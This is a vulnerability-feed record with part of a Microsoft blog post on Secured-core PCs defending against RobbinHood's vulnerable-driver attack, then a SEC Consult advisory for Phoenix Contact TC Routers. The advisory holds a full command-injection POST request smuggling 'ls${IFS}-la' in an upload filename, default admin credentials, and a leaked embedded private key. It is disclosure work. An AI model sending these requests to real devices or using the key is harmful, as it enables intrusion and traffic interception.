enabled](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-system-guard/system-guard-how-hardware-based-root-of-trust-helps-protect-windows>) \nDefend against vulnerable and malicious drivers | [Hypervisor-protected code integrity (HVCI) enabled](<https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity>) \nDefend against unverified code execution | Arbitrary code generation and control flow hijacking protection [CFG, xFG, CET, ACG, CIG, KDP] enabled \nDefend against limited physical access, data attacks | [Kernel DMA protection enabled](<https://docs.microsoft.com/en-us/windows/security/information-protection/kernel-dma-protection-for-thunderbolt>) \nProtect identities and secrets from external threats | [Credential Guard enabled](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works>) \n \nWhile some of these features have previously existed, customers had the burden of (1) choosing the right hardware profile that supported all of these features and (2) enabling these features on their devices. With Secured-core PCs, these hardware-backed security features are assured to work on the hardware and are enabled by default.\n\n## Advanced security features: Secure device risk, anti-tampering, driver control, firmware control, supply-chain interdiction, and more\n\nThe hardware-backed security features that are enabled by default, along with a combination of Secured-core services, seamlessly integrate with Microsoft Defender ATP, lighting up additional security scenarios and providing unified protection against the entire attack chain.\n\nIn this blog, we will showcase how Secured-core PC features deliver strong driver controls that protects against threats that use vulnerable drivers to elevate privilege, using the RobbinHood ransomware as example.\n\n## Case study: Secured-core PCs vs. RobbinHood ransomware\n\n[RobbinHood ](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Robinhood.A&ThreatID=2147735370>)ransomware is distributed as a packed executable that contains multiple binaries. One of these files is a Gigabyte driver (_GDRV.sys_), which has a [vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-19320>) that could allow elevation of privilege, enabling an adversary to gain kernel privileges. In RobbinHood campaigns, adversaries use these kernel privileges to disable kernel-mode signing to facilitate the loading of an unsigned driver. The unsigned malicious driver is then used to disable security products from the kernel.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/03/RobbinHood-ransomware-attack-chain.png)\n\n_Figure 1. RobbinHood ransomware attack chain_\n\nRobbinHood is not an isolated threat leveraging a vulnerable driver to achieve elevation of privilege. In the last two years, the Microsoft Defender ATP Research Team has seen a rise in the use of vulnerable drivers by adversaries, ranging from commodity malware to nation-state level attacks. In addition to vulnerable drivers, there are also drivers that are vulnerable by design (also referred to as \u201cwormhole drivers\u201d), which can break the security promise of the platform by opening up direct access to kernel-level arbitrary memory read/write, MSRs.\n\nIn our research, we identified over 50 vendors that have published many such wormhole drivers. We actively work with these vendors and determine an action plan to remediate these drivers. In order to further help customers identify these drivers and take necessary measures, we built an automated way in which we can block vulnerable drivers, and that is updated through Windows update. Customers can also manage their own blocklist as outlined in the sections below.\n\n### Preventive defenses\n\nTwo of the security promises of Secured-core PCs are directly applicable to preventing RobbinHood attacks:\n\n * Defending against vulnerable and malicious drivers\n * Defending against unverified code execution\n\n#### Defending against vulnerable and malicious drivers\n\nSecured-core PCs are the latest hardware to provide driver control out of the box, with baseline configuration already set. Driver control is provided by a combination of HVCI & Windows Defender Application Control ([WDAC](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control>)) technologies.\n\nEvery driver loaded into the kernel is verified by HVCI before it\u2019s allowed to run. HVCI runs in a hardware-protected execution environment isolated from the kernel space and cannot be tampered with by other code running in the kernel, including drivers.\n\nDriver control uses HVCI & WDAC technologies to perform the following operations:\n\n 1. Validity and memory integrity enforcement at load-time and runtime\n\nHVCI uses hardware-based virtualization and the hypervisor (the same hypervisor also used in Azure) to protect Windows kernel mode processes from injection and execution of malicious or unverified code. The integrity of code that runs in the Windows kernel is validated by HVCI according to the kernel signing policy applied to the device. Additionally, kernel memory pages are never simultaneously writable and executable. This makes Secured-core PCs highly resistant to malicious software attempting to gain code execution in the kernel.\n\nIn the case of _GDRV.sys_, which is the driver used by the RobbinHood malware, if the vulnerable driver is successfully loaded and then exploited, the runtime memory integrity check would protect the critical components. Thus, an attack to change _ci!g_CiOptions_ and _nt!g_CiEnabled_**, **would be ineffective, as the kernel ignores changes to the variables coming from the general kernel space. And, as code integrity is enabled by default, the malicious driver _RBNL.sys_ wouldn\u2019t load.\n\nThe image below shows an event log from a Secured-core PC showing runtime memory integrity check preventing the CI options from being tampered with by RobbinHood and, subsequently, preventing the malicious driver **RBNL.sys** from being loaded.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/03/validity-and-memory-integrity-enforcement.png)\n\n_Figure 2. Event log from Secured-core PC_\n\nBecause runtime memory integrity check is enabled by default on Secured-core PCs, RobbinHood wouldn\u2019t be able to disable code integrity on these machines.\n\n 2. Blocklist check\n\nWhile the most ideal scenario is for enterprises to set customer-specific allows lists, it can be a complex undertaking. To help customers, HVCI uses a blocklist of drivers that are blocked from loading. This blocklist is supplied in two ways:\n\n * * Microsoft-supplied blocklist\n\nMicrosoft threat research teams continuously monitor the threat ecosystem and update the list of drivers that in the Microsoft-supplied blocklist. This blocklist is pushed down to devices via Windows update.\n\nWe\u2019ve heard from customers that they\u2019d like to provide a list of drivers that should be on the generic Microsoft-supplied blocklist. We\u2019re working on a new feature that allow customers to submit drivers that they\u2019d like us to review and add to the Microsoft-supplied blocklist.\n\n * * Customer-specific blocklist\n\nWe recognize that there are situations where customers want a blocklist specific to their organization. By default, any validly signed driver is accepted, but customers can choose to reduce the list of accepted drivers by choosing only WHQL signed drivers. These are drivers that are submitted to Microsoft for signing and are run through a number of tests before being signed.\n\nDevices can apply a custom code integrity policy that customers can use to define their own specific blocklist. [This article](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) has more information on how to create such a customer specific blocklist. Below is an example of a customer-specific blocklist that blocks the vulnerable driver _GDRV.sys_.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/03/customer-specific-blocklist.png)\n\n_Figure 3. Custom blocklist that blocks the vulnerable driver GDRV.sys_\n\n#### Defending against unverified code execution and kernel data corruption attacks\n\nThere are several [unverified code execution mitigations](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/exploit-protection>) built-in to Windows. These are readily available on Secured-core PCs.\n\nThe RobbinHood attack utilized the vulnerable_ GDRV.sys_ driver to change a crucial variable within the system memory. Although HVCI already protects against the attack on _g_CiOptions_, other areas of memory may still be susceptible, and we need broader defense against kernel data corruption attacks.\n\nIn addition to existing mitigations, Windows is introducing a new feature called Kernel Data Protection (KDP), which provides driver developers and software running in the Windows kernel (and the OS code itself) with the ability to mark some kernel memory containing sensitive information as read-only protected. The memory is protected through the second level address translation (SLAT) tables by the hypervisor, such that no software running in VTL0 have access to the protected memory. KDP does not protect executable pages, as those are already protected with HVCI.\n\nMany kernel components have data that is set only once during boot and remains unchanged for the rest of the boot cycle. The first release of KDP protects the static data sections of a driver. In the future, we\u2019re also planning to provide APIs to dynamically allocate and release protected initialized pool memory.\n\nSecured-core PCs have KDP enabled by default.\n\n### Detection defenses\n\nAs observed in RobbinHood attacks, once the threat gains kernel-level privilege, the threat turns off system defenses, including the endpoint protection agent. Secured-core PCs provide a monitoring agent that utilizes [virtualization-based security](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>) and runs in this protected environment.\n\nThe monitoring agent performs several functions. The ones relevant for this case study are:\n\n * Secure anti-tampering for security agents\n * Secure monitoring of Windows\n\n#### Secure anti-tampering for security agents\n\nThis monitoring agent watches for attempts to tamper with the security agents. For Microsoft Defender ATP customers, these are integrated into alerts that are surfaced in Microsoft Defender Security Center.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/03/Windows-Defender-System-Guard.png)\n\n_Figure 4. Windows Defender System Guard runtime monitor agent_\n\n#### Secure monitoring of Windows\n\nThe agent also monitors several areas of Windows, including checking for kernel exploit behavior that are often used to elevate privileges. In this particular case, the monitoring agent detected a token tampering assertion.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2020/03/Microsoft-Defender-ATP-alert-1024x603.jpg)\n\n_Figure 5. Microsoft Defender ATP alert for process privilege escalation_\n\nSecured-core PCs have both VBS and this secure monitoring agent turned on by default.\n\n## Conclusion\n\nAs this case study demonstrates, more and more threats are becoming so advanced that they can bypass software-only based defenses. Secured-core PCs are protected from RobbinHood and similar threats by default.\n\nCustomers can also get similar protection on traditional devices as long as they have the necessary hardware and are configured correctly. Specifically, the following features need to be enabled: Secure boot, HVCI (enables VBS), KDP (automatically turned on when VBS is on), KDMA (Thunderbolt only) and Windows Defender System Guard.\n\nWith [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>), however, customers get a seamless chip to cloud security pattern that starts from a strong hardware root of trust and works with cloud services and Microsoft Defender ATP to aggregate and normalize the alerts from hardware elements to provide end-to-end endpoint security.\n\nOverall improved endpoint protection accrues to the broader [Microsoft Threat Protection](<https://www.microsoft.com/security/blog/2020/02/20/microsoft-threat-protection-intelligence-automation/>), which combines and orchestrates into a single solutions the capabilities of Microsoft Defender ATP, Office 365 ATP, Azure ATP, and Microsoft Cloud App Security to provide comprehensive, cross-domain protection for endpoints, email and data, identities, and apps.\n\n \n\nThe post [Secured-core PCs: A brief showcase of chip-to-cloud security against kernel attacks](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) appeared first on [Microsoft Security.", "modified": "2020-03-17T16:00:49", "published": "2020-03-17T16:00:49", "id": "MSSECURE:057ED5C1C386380F0F149DBAC7F1F6EF", "href": "https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/", "type": "mssecure", "title": "Secured-core PCs: A brief showcase of chip-to-cloud security against kernel attacks", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-14T22:50:18", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-14T00:00:00", "published": "2020-03-14T00:00:00", "id": "PACKETSTORM:156729", "href": "https://packetstormsecurity.com/files/156729/Phoenix-Contact-TC-Router-TC-Cloud-Client-Command-Injection.html", "title": "Phoenix Contact TC Router / TC Cloud Client Command Injection", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20200312-0 > \n======================================================================= \ntitle: Authenticated Command Injection \nproduct: Phoenix Contact TC Router & TC Cloud Client \nvulnerable version: <=2.05.3 & <=2.03.17 & <=1.03.17 \nfixed version: 2.05.4 & 2.03.18 & 1.03.18 \nCVE number: CVE-2020-9436, CVE-2020-9435 \nimpact: High \nhomepage: https://www.phoenixcontact.com/ \nfound: 2020-01-23 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Phoenix Contact is a globally present, Germany-based market leader. Our group \nis synonymous with future-oriented components, systems, and solutions in the \nfields of electrical engineering, electronics, and automation. A global network \nacross more than 100 countries and 15,000 employees ensure close proximity to \nour customers, which we believe is particularly important.\" \n \nSource: \nhttps://www.phoenixcontact.com/online/portal/pc?1dmy&urile=wcm%3apath%3a/pcen/web/corporate/company/subcategory_pages/Who_we_are/ \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these products \nconducted by security professionals to identify and resolve all security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.18.5 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scalable firmware runtime. \n \n2) Authenticated Command Injection (CVE-2020-9436) \nAn authenticated command injection vulnerability can be triggered by issuing a \nPOST request to the \"/cgi-bin/p/adm/cfg\" CGI program which is available on the \nweb interface. An attacker can abuse this vulnerability to compromise the \noperating system of the device. This issue was found by emulating the firmware \nof the device. \n \n3) Embedded Private X.509 Certificate (CVE-2020-9435) \nThe device contains a hardcoded certificate which can be used to run the web \nservice. This certificate is used for HTTPS (default server certificate for \nweb based configuration and management). \n \nImpersonation, man-in-the-middle or passive decryption attacks are possible. \nThese attacks allow an attacker to gain access to sensitive information like \nadmin credentials and use them in further attacks. \n \n \nProof of concept: \n----------------- \n1) Known BusyBox Vulnerabilities \nBusyBox version 1.18.5 contains multiple CVEs like: \nCVE-2016-6301, CVE-2014-9645 and CVE-2013-1813. \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n2) Authenticated Command Injection (CVE-2020-9436) \nAn authenticated command injection is possible via a crafted POST request. \n \nThe configuration upload form in the web-interface can be used to upload an XML \nconfiguration file. The filename of this XML file can be modified with an \ninterceptor proxy in order to inject system commands. The JavaScript code which \nis used to do client-side filtering can be bypassed in this way. Because of \nblacklisting of some characters, the ${IFS} command must be used for adding \nwhitespaces. \n \nRequest: \n------------------------------------------------------------------------------- \nPOST /cgi-bin/p/adm/cfg HTTP/1.1 \nHost: $IP \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: multipart/form-data; boundary=---------------------------10834433251208329385252513488 \nContent-Length: 724 \nAuthorization: Basic YWRtaW46YWRtaW4= \nConnection: close \nUpgrade-Insecure-Requests: 1 \nCache-Control: no-transform \n \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"exportmode\" \n \n0 \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"xmlmode\" \n \non \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"importmode\" \n \n0 \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"cfg_upload\"; filename=\"config.xml;ls${IFS}-la\" \nContent-Type: application/octet-stream \n \n \n \ntext \n \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"cfg_submit\" \n \n \n-----------------------------10834433251208329385252513488-- \n \n \n \n \nResponse from the web-server: \n \n \nHTTP/1.0 200 OK \nContent-Type: text/html \nCache-Control: no-cache \n \n<!DOCTYPE html> \n<html> \n<head> \n<meta charset=\"utf-8\"><meta http-equiv=\"Cache-Control\" content=\"no-cache\"> \n<style> \n/* CSS main */ \n \nbody \n{ \nfont-family: verdana, arial, helvetica, sans-serif; \nfont-size: 12px; \n} \n[...snip...] \n.TextWarning \n{ \nvertical-align: middle; \ncolor: #FF4000; \n} \n</style> \n<title>Configuration up-/download</title> \n</head> \n<body> \n<pre>xml parsed \nsetup new config done \ntotal 499 \ndrwxr-xr-x 2 root root 1024 Jan 28 2020 . \ndrwxr-xr-x 3 root root 1024 Jan 28 2020 .. \n-rwxr-xr-x 1 root root 5544 Jan 28 2020 atcmd \n-rwxr-xr-x 1 root root 9624 Jan 28 2020 basicsetup \n-rwxr-xr-x 1 root root 9012 Jan 28 2020 cfg \n-rwxr-xr-x 1 root root 7396 Jan 28 2020 conchk \n-rwxr-xr-x 1 root root 9128 Jan 28 2020 ddns \n-rwxr-xr-x 1 root root 14504 Jan 28 2020 dhcp \n-rwxr-xr-x 1 root root 4776 Jan 28 2020 dmesg \n-rwxr-xr-x 1 root root 6040 Jan 28 2020 edit_email \n-rwxr-xr-x 1 root root 6648 Jan 28 2020 edit_sms \n-rwxr-xr-x 1 root root 18288 Jan 28 2020 fw \n-rwxr-xr-x 1 root root 10560 Jan 28 2020 gprs \n-rwxr-xr-x 1 root root 12268 Jan 28 2020 gsm \n-rwxr-xr-x 1 root root 6784 Jan 28 2020 gsmlog \n-rwxr-xr-x 1 root root 11172 Jan 28 2020 io \n-rwxr-xr-x 1 root root 9812 Jan 28 2020 ipscert \n-rwxr-xr-x 1 root root 7604 Jan 28 2020 ipscon \n-rwxr-xr-x 1 root root 9928 Jan 28 2020 ipsike \n-rwxr-xr-x 1 root root 16728 Jan 28 2020 ipsset \n-rwxr-xr-x 1 root root 13808 Jan 28 2020 lanif \n-rwxr-xr-x 1 root root 5528 Jan 28 2020 leases \n-rwxr-xr-x 1 root root 6512 Jan 28 2020 log \n-rwxr-xr-x 1 root root 9656 Jan 28 2020 masqtbl \n-rwxr-xr-x 1 root root 5313 Jan 28 2020 mdmupl \n-rwxr-xr-x 1 root root 17912 Jan 28 2020 napt \n-rwxr-xr-x 1 root root 7704 Jan 28 2020 ovpnadvanced \n-rwxr-xr-x 1 root root 9656 Jan 28 2020 ovpncert \n-rwxr-xr-x 1 root root 6524 Jan 28 2020 ovpncon \n-rwxr-xr-x 1 root root 7856 Jan 28 2020 ovpnkey \n-rwxr-xr-x 1 root root 13012 Jan 28 2020 ovpnnapt \n-rwxr-xr-x 1 root root 19732 Jan 28 2020 ovpntunnel \n-rwxr-xr-x 1 root root 4760 Jan 28 2020 phonebook \n-rwxr-xr-x 1 root root 8284 Jan 28 2020 reboot \n-rwxr-xr-x 1 root root 5956 Jan 28 2020 routes \n-rwxr-xr-x 1 root root 10840 Jan 28 2020 rtc \n-rwxr-xr-x 1 root root 6928 Jan 28 2020 security \n-rwxr-xr-x 1 root root 17860 Jan 28 2020 sim \n-rwxr-xr-x 1 root root 7080 Jan 28 2020 sms \n-rwxr-xr-x 1 root root 7960 Jan 28 2020 smtp \n-rwxr-xr-x 1 root root 7048 Jan 28 2020 snmp \n-rwxr-xr-x 1 root root 5964 Jan 28 2020 socksrv \n-rwxr-xr-x 1 root root 9632 Jan 28 2020 sroute \n-rwxr-xr-x 1 root root 14668 Jan 28 2020 srvfw \n-rwxr-xr-x 1 root root 5456 Jan 28 2020 sshconfig \n-rwxr-xr-x 1 root root 11224 Jan 28 2020 sysconfig \n-rwxr-xr-x 1 root root 19996 Jan 28 2020 test \n-rwxr-xr-x 1 root root 4712 Jan 28 2020 update \n-rwxr-xr-x 1 root root 73 Jan 28 2020 upload \n-rwxr-xr-x 1 root root 30 Jan 28 2020 upremove \n-rwxr-xr-x 1 root root 7132 Jan 28 2020 user \n-rwxr-xr-x 1 root root 9672 Jan 28 2020 webcert \n-rwxr-xr-x 1 root root 10932 Jan 28 2020 webconfig \n</pre><pre>please reboot next</pre> \n</body> \n</html> \n \n \n \n3) Embedded Private X.509 Certificate (CVE-2020-9435) \nThe X.509 certificate was found on more than one device on Censys.io: \nSHA256 fingerprint: 8ca503b99f7eadc839747dfe612b256efcdc4e01bbf5757c0fb663e5a22836b8 \n \n-----BEGIN PRIVATE KEY----- \nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDm6jUy8KLYSPXo \nBiPx8LAlVcV4/6+pi+d4KzH6rvSoREYrjpalUMGbmoAdtbkr3qzvrLMP0s7tDOQB \nYfH40u1QvEWgN5iWGz+TONXbeg7p+ZjD63Cu+tu9Knj5ZoZ7zDVgOF2UaVVrQkpH \nCYXagnaplnQCbc1DiuvG8ha9ICaWuf7upNPiNpgdiGqrPwaqSCYhmi7K7Ej4dOpZ \n5Ji/LKxCGjokVpxlYgbJbNMtrBXdBjsVh8WMImxQe7g00CQhMIK6YfE7eOsXDTLP \nZDXIbf42emJ84kpU57ISI9ru1gmt7Jkl0EJlTwyMV/9NUXavpf15LnpKnkXK0Ez/ \nFu5erzVBAgMBAAECggEBAMP65yfSwAMc+UfxXjSK+JTXVQA60ZXuXYfJ8WM3dgIR \n4BQ7snOgNJGh8TZF82DeXpwUUO0PF/xswl7CCCIMssmg4N74EJLlkXGb/TWHRH0k \nD5nIixyXYEQOdhoGAAG18V82t4WsWIjt/CiKVoZ7z8ZjIRampl263B0/fjkJvnaQ \nzDzeF0Pnh9UAyjJQiec6wEFO2FUmU0XHgWOylzTUm+kWPg3de4SNA6kpSbOFKM4y \nxjdVUBK6ECT42EaJK5Ie3Fk3wKH11HQSYr2wRkC3VbN9XU4qUiOeQzNgAX5FRaBd \nEgyu1gkJvOOiKCmBB3hyoJA8eipyMoOtuWRJnO0aRBkCgYEA/qZrfYIUn/OA3iPe \n809eJoLsMI4ACOf46W4irskoOF1qRZ0WJZtbIY3vcsw+m+sKYZW8RyUrl9UoOhVT \nyYMNlhwWOyztvp+jembEiS1XaW9K5gfV7Z/+KAenGjd/MLvRB5GU9Yt0knyY5QwP \nrcQgE/Pgr19o++e2my+1etzxAD8CgYEA6COT0Am0ECGrIm+rR4VYlvMaT1V/RTpY \nWOfo7gExbyBj45vrTWKNGm1eAthOXwYLHA0Aan3bOrw3fprAmWrc1dhHC3+1Kjrn \nmqOv/rWzpN1WRbehNJd0VmcTI9M1XDONTbrs44cvN+Fpt88gxXFkDTRZs7onMPz5 \neOCNdGV6an8CgYB2l5htrfve9e8pBPmaxHarZsOKZUc83pN8Wq9KSSIzBcYtP1gG \nEZDiUpCWHOp3gIGoKqyxUW0426tNSYtoyGC2bMQpsOXTpdLjeSLEY9pWnt75u+J0 \nNNOPXukCe5//WSii5rjBlb2nTuGBohlXKoRp5mTYJ43j6uiO4ywYWPbfzwKBgQDN \nRMBswlfNt+fbAIGlMZ1/hSHrqv9qWMhMfW00ICv1Rt/tIS91c0Kwbqslut26Gt7y \nA/EtOXMEwfAUbIUIZD04fxF7cobg+8tWq41xnnxmuS2TYmgS2CYQTP7Yu+fASvmV \nFUhpfV1cfV99IJOq47SEFJmJWn9TSy7SG0YZ+a3AwwKBgEXATr+IAy04ASrtOf2Z \nySc5PbttVW1gMJd+BpyaXPa2qf7w/jELbOCfu4qe17qD2yufgyOzurikFfNayVbt \nxkOmyj24eKmwHKH+zmUy63i+kqiRqXUpypmFQzPRf7LQXYPZEv7IkVP/+ney4G9T \na0lM1ut6+1o9FLcqrnZk9uLY \n-----END PRIVATE KEY----- \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware version has been tested: \n \n* TC Router 3002T-4G ATT / 2.05.3 \n* TC Cloud Client 1002-TX/TX / 1.03.17 \n \nAccording to the vendor, the following devices are affected as well: \n \nArticle name Article number Affected versions \nTC ROUTER 3002T-4G 2702528 <= 2.05.3 \nTC ROUTER 3002T-4G 2702530 <= 2.05.3 \nTC ROUTER 2002T-3G 2702529 <= 2.05.3 \nTC ROUTER 2002T-3G 2702531 <= 2.05.3 \nTC ROUTER 3002T-4G VZW 2702532 <= 2.05.3 \nTC ROUTER 3002T-4G ATT 2702533 <= 2.05.3 \nTC CLOUD CLIENT 1002-4G 2702886 <= 2.03.17 \nTC CLOUD CLIENT 1002-4G VZW 2702887 <= 2.03.17 \nTC CLOUD CLIENT 1002-4G ATT 2702888 <= 2.03.17 \nTC CLOUD CLIENT 1002-TXTX 2702885 <= 1.03.17 \n \n \nVendor contact timeline: \n------------------------ \n2020-01-29: Sent advisory to vendor via PGP through psirt@phoenixcontact.com; \nVendor confirmed to receive the advisory. \n2020-02-26: Vendor stated that the vulnerabilities were confirmed and that a \nfirmware upgrade will be available in the next days. \n2020-02-29: Asked vendor for further affected devices and firmware versions. \n2020-03-02: Received information about further affected devices and firmware \nversions from vendor. The release of the new firmware version is \nplanned for the end of the week. CVE numbers were requested by \nthe vendor. \n2020-03-05: Found new firmware version numbers on the vendor's website. Asked \nthe vendor about the status regarding CVE numbers. \n2020-03-05: Received CVE numbers. \n2020-03-12: Coordinated release of security advisory. \n \n \nSolution: \n--------- \nUpdate the firmware of the affected devices to 1.03.18, 2.03.18 or 2.05.4. \n \nThe new versions can be downloaded from the firmware page: \nhttps://www.phoenixcontact.com/online/portal/us?1dmy&urile=wcm%3apath%3a/usen/web/main/service_and_support/application_pages/Firmware/Firmware \n \n \nWorkaround: \n----------- \nRestrict network access to the device. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2020 \n \n \n`\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156729/SA-20200312-0.txt"}]}